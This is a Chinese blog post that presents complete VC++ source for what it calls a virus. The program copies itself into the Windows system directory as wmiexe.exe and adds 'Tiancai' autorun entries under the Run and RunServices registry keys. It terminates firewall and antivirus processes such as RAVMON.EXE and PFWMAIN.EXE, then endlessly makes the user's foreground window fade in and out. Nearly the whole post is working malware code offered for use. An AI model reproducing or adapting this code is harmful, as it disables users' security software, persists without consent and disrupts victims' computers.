zoukankan      html  css  js  c++  java

  • VC++ 关闭防火墙,写入注册表

    HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun启动相,实现开机自运行。病毒表现为是使用SetLayeredWindowAttributes函数,使当前窗口变为透明。

    程序运行先关闭防火墙,写入注册表,再用LoadLibrary和GetProcAddress确定SetLayeredWindowAttributes函数位置,再用GetForegroundWindow得到当前窗口句柄,使其透明。

    透明.cpp程序如下

    #include "stdafx.h"

    #include <winuser.h>

    #include <windows.h>

    #include <shellapi.h>

    #include <tlhelp32.h>

    #pragma comment(lib, "User32.lib")

    unsigned char level;

    char buffer[255];

    char syspath[100];

    char exefile[100];

    int err;

    HKEY regkey;

    HANDLE hMutex;

    typedef DWORD (WINAPI *PFUNC)(HWND,DWORD,BYTE,DWORD);

    bool instr(char* a,char* b)

    {

    if (strlen(a)<strlen(b)){return false;}

    unsigned int i,j;

    bool r=false;

    for (i=0;i<strlen(a)-strlen(b)+1;i++)

    {

    if ((a[i]==b[0])||(a[i]==b[0]+32)||(a[i]==b[0]-32))

    {

    r=true;

    for (j=i;j-i<strlen(b);j++)

    {

    if ((a[j]!=b[j-i])&&(a[j]!=b[j-i]+32)&&(a[j]!=b[j-i]-32)){r=false;break;}

    }

    }

    }

    return r;

    }

    void KillProc(bool opt)

    {

    HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

    PROCESSENTRY32* info=new PROCESSENTRY32;

        info->dwSize=sizeof(PROCESSENTRY32);

    if(Process32First(handle,info))

    {

    if(GetLastError()!=ERROR_NO_MORE_FILES )

    {

    if (opt)

    {

    if (instr(info->szExeFile,"wmiexe.exe"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    else

    {

    if (instr(info->szExeFile,"PFWMAIN.EXE")||

    instr(info->szExeFile,"RAVMON.EXE")||

    instr(info->szExeFile,"RAVTIMER.EXE")||

    instr(info->szExeFile,"RAVSERVICE.EXE")||

    instr(info->szExeFile,"CCENTER.EXE"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    while(Process32Next(handle,info)!=FALSE)

    {

    if (opt)

    {

    if (instr(info->szExeFile,"wmiexe.exe"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    else

    {

    if (instr(info->szExeFile,"PFWMAIN.EXE")||

    instr(info->szExeFile,"RAVMON.EXE")||

    instr(info->szExeFile,"RAVTIMER.EXE")||

    instr(info->szExeFile,"RAVSERVICE.EXE")||

    instr(info->szExeFile,"CCENTER.EXE"))

    {

    HANDLE h=OpenProcess(0,false,info->th32ProcessID);

    TerminateProcess(h,0);

    }

    }

    }

    }

    }

       CloseHandle(handle);

    }

    int APIENTRY WinMain(HINSTANCE hInstance,

                         HINSTANCE hPrevInstance,

                         LPSTR     lpCmdLine,

                         int       nCmdShow)

    {

      // TODO: Place code here.

    level=255;

    int d_level=5;

    HWND hwnd;

    long win_long;

    strset(syspath,0);

    strset(exefile,0);

    HMODULE module = GetModuleHandle(0); 

    GetModuleFileName(module, exefile, sizeof (exefile)); 

    GetSystemDirectory(syspath,100);

    if (!instr(exefile,syspath))

    {

    strcat(syspath,"\wmiexe.exe");

    while (CopyFile(exefile,syspath,false)==0)

    {

    err=GetLastError();

    if (err==32){KillProc(true);}

    Sleep(10);

    }

    ShellExecute(NULL,"OPEN",syspath,NULL,NULL,1);

    Sleep(10);

    ExitProcess(0);

    }

    else

    {

    hMutex = CreateMutex (NULL, TRUE, "          ");

    if (GetLastError () == ERROR_ALREADY_EXISTS){::ExitProcess(0);}

    err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

    err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

    err=RegCloseKey(regkey);

    }

    HMODULE m_hDLLUser32=LoadLibrary( "user32" );

    PFUNC SetLayeredWindowAttributes =(PFUNC)::GetProcAddress( m_hDLLUser32, "SetLayeredWindowAttributes" );

    start:

    //hwnd=FindWindow("Shell_TrayWnd",NULL);

    hwnd=GetForegroundWindow();

    if ((hwnd!=0)&&

    (hwnd!=GetDesktopWindow())&&

    (hwnd!=FindWindow("Shell_TrayWnd",NULL))&&

    (hwnd!=FindWindow("Progman",NULL)))

    {

    win_long=GetWindowLong(hwnd,GWL_EXSTYLE);

    SetWindowLong(hwnd,GWL_EXSTYLE,win_long|0x80000);

    SetLayeredWindowAttributes(hwnd, NULL, level, 2);

    }

    Sleep(1);

    if (level>=254){d_level*=(-1);Sleep(1000);}

    if (level<=50){d_level*=(-1);}

    level+=d_level;

    goto start;

    return 0;

    }
  • 相关阅读:
    barcode制作条形码及破解
    软件敏捷架构师
    软件需求分析三步走
    GDI+显示GIF动画
    CSpinButtonCtrl的弱智问题
    [C++] STL里面的map
    [C#] 再议Exception
    [C++] unsigned是麻烦制造者
    用GDI+转BMP为WMF、EXIF、EMF格式
    [C++] 编译时的warning
  • 原文地址:https://www.cnblogs.com/hzcya1995/p/13318820.html
Copyright © 2011-2022 走看看